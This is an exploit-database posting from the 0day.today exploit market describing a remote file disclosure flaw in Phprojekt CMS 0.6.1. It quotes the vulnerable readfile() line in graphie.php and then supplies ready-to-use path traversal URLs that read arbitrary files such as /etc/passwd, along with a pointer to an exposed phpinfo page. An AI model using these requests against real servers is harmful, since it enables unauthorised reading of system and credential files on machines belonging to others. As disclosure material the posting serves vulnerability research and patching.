[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Content Management System for Phprojekt 0.6.1 File Disclosure Vuln

Author
Houssamix
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2930
Category
web applications
Date add
26-04-2008
Platform
unsorted
==================================================================
Content Management System for Phprojekt 0.6.1 File Disclosure Vuln
==================================================================




--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : 	Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
      			           
							   
= BUG  :  Remote File Disclosure Vulnerability 

 Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared 	 

= Exploit :

target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd

= see phpinfo 
target.com/cm/phpinfo.php



#  0day.today [2024-12-25]  #